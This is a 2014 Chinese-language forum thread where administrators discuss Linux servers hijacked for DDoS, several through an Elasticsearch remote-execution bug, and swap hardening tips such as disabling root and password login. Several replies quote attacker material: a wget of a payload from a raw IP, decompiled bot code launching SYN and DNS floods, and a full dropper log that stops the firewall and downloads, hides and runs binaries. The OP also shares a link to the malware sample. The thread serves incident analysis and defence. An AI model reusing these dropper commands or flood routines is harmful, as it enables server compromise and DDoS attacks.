1
ihacku 2014-07-07 13:09:11 +08:00
|
2
wzxjohn 2014-07-07 13:19:44 +08:00
wget http://96.44.185.98:8080/ssh33
这个文件没下载下来,撸主能否上传到百度盘看看。 |
3
wzxjohn 2014-07-07 13:37:59 +08:00 1
|
5
avrillavigne 2014-07-07 14:00:46 +08:00
诺顿scep 报Backdoor.Piltabe
|
6
humiaozuzu 2014-07-07 14:04:34 +08:00
我有几台服务器也被入侵了,不过还好权限是 elasticsearch 结束掉进程就 OK,没有被替换文件,补了 ES 的 bug 就好。
然后看了下下载的文件都一样,也是被用作 DDOS 了 |
7
evilangel OP @wzxjohn 上传到百度网盘了,地址http://pan.baidu.com/s/1pJ9atC3 另外怎么看出来这个是DDOS服务程序的?用猜的我这种最可能的是DDOS或者服务器口令自动破解程序之类的。
@humiaozuzu 居然遇到的都是一样的。但是想不通是怎么在这么快的时间内破解我的root密码的。 |
8
markmx 2014-07-07 16:22:06 +08:00
前几天 我也被攻击了。 是土耳其的攻击。慢慢的斗智斗勇,终于搞定了
|
9
markmx 2014-07-07 16:22:53 +08:00
密码扫描这个事情。最好还是加上判断。几次输入密码错误,封闭IP!
|
10
humiaozuzu 2014-07-07 16:40:23 +08:00
@evilangel 如果不是弱口令,一般是已有的服务的 0day,比如我遇到的就是 elasticsearch 的,如果你那个服务用的是 root 权限运行,就可以随意修改密码了
|
12
henices 2014-07-07 17:38:23 +08:00
int __cdecl AddTask(int a1)
{ int v1; // ebx@1 int v2; // ebx@2 int v4; // eax@6 int v5; // edi@6 int v6; // eax@7 int v7; // eax@11 int v8; // eax@13 pthread_mutex_lock(TaskLockMutex); v1 = taskcount; if ( (unsigned int)taskcount > 0x13 ) { v2 = taskcount + 33554432; goto LABEL_3; } if ( CheckTaskExist(a1 + 80) ) { v2 = v1 + 536870912; goto LABEL_3; } v4 = malloc(132); v5 = v4; if ( !v4 ) { v2 = v1 + 134217728; goto LABEL_3; } memcpy(v4, a1, 112); v6 = *(_DWORD *)(v5 + 8); if ( v6 & 1 ) { v7 = HbCreateThread(SynFloodThread, v5, v5 + 112, 0, 1); } else { if ( !(v6 & 2) ) { LABEL_9: v2 = v1 + 67108864; free(v5); goto LABEL_3; } v7 = HbCreateThread(DnsFloodThread, v5, v5 + 112, 0, 1); } if ( v7 != 1 ) goto LABEL_9; v8 = pMaskTask; if ( pMaskTask ) { *(_DWORD *)(v5 + 128) = 0; *(_DWORD *)(v5 + 124) = v8; *(_DWORD *)(v8 + 128) = v5; pMaskTask = v5; } else { pMaskTask = v5; *(_DWORD *)(v5 + 124) = 0; *(_DWORD *)(v5 + 128) = 0; } __asm { lock add ds:taskcount, 1 } v2 = taskcount + 268435456; LABEL_3: pthread_mutex_unlock(TaskLockMutex); return v2; } |
13
evilangel OP @markmx 厉害,膜拜了!看来后面是需要配置一下。
@humiaozuzu 我是刚装完的系统,什么软件都没装了然后才一天时间就密码被人改了登陆不上了。重置密码之后就发现目录下面有东西然后历史命令里多了这十几条命令。 @wzxjohn 嗯嗯,没太注意看,刚又看了下发现了。谢谢了! @henices 牛!!! |
15
Owenjia 2014-07-08 01:17:30 +08:00 via Android
还是禁止密码登录比较好吧~~
|
17
Owenjia 2014-07-08 15:31:56 +08:00
@jalen 你是用的 ssh 吧?可以用密钥登陆啊~~可以看下这里 http://en.wikipedia.org/wiki/Ssh-keygen
|
19
oldcai 2014-07-09 14:51:16 +08:00
我也碰到同样的事情了,elasticsearch漏洞导致远程执行。
前几天被服务商告知在发出ddos攻击,我还不太相信,因为我一直都只用公私钥,不用密码登陆。 从log里面看来,一直在执行下面的东西。 /etc/init.d/iptables stop chmod 0775 /usr/bin/nohup chmod 0775 /usr/bin/killall chmod 0775 /usr/bin/rm chmod 0775 /usr/bin/wget mkdir /etc/plngius killall .Linux_time_y_2014 rm -r -f /etc/plngius/.Linux_time_y_2014 wget -O /etc/plngius/.Linux_time_y_2014 http://119.1.109.43:4443/txma chmod 0755 /etc/plngius/.Linux_time_y_2014 nohup /etc/plngius/.Linux_time_y_2014 > /dev/null 2>&1 & killall .Linux_time_y_2015 rm -r -f /tmp/.Linux_time_y_2015 wget -O /tmp/.Linux_time_y_2015 http://119.1.109.43:4443/xudp chmod 0755 /tmp/.Linux_time_y_2015 nohup /tmp/.Linux_time_y_2015> /dev/null 2>&1 & exit |
20
pythoner 2014-07-09 21:51:25 +08:00
@jalen
1,修改ssh的默认端口 2,禁止root账号登陆 3,新建一个账号(不要用admin之类容易猜到的账号,并设置一个复杂的密码)并让其可以sudo su成root 4,用DenyHosts防止暴力破解将对方尝试破解的ip拒绝掉 我贴一个日志: tail -n 1000 auth.log |grep 'Failed password for root ' Jul 9 20:26:02 s1 sshd[30294]: Failed password for root from 61.128.110.39 port 45014 ssh2 Jul 9 20:26:06 s1 sshd[30311]: Failed password for root from 61.128.110.39 port 46366 ssh2 Jul 9 20:26:09 s1 sshd[30459]: Failed password for root from 61.128.110.39 port 47481 ssh2 从上面的日志可以看到对方在尝试不同的端口号,由于我禁止了root账号登陆,所以就算端口号猜对了也会失败,失败3次之后 61.128.110.39就自动被防火墙拒绝掉(/etc/hosts.deny ) |
21
tonyluj 2014-07-10 00:19:12 +08:00
千万不要用root登录,用个普通权限的user + sudo即可,文件权限也不要用chmod 777
SSH直接禁止ROOT + 改端口 + 证书登录 并装上fail2ban,防止别人暴力破解 |
22
songday 2014-07-10 03:58:15 +08:00
我刚刚也是被通知,说有两个机器被用作 DDOS 攻击了
刚好上面也跑了 ES,那个 ES 补丁是在官网上的吗? |
23
songday 2014-07-11 01:10:06 +08:00
@humiaozuzu 你好,能告知一下 ES 的补丁是在哪里吗?
我在官网上没有找到 :( |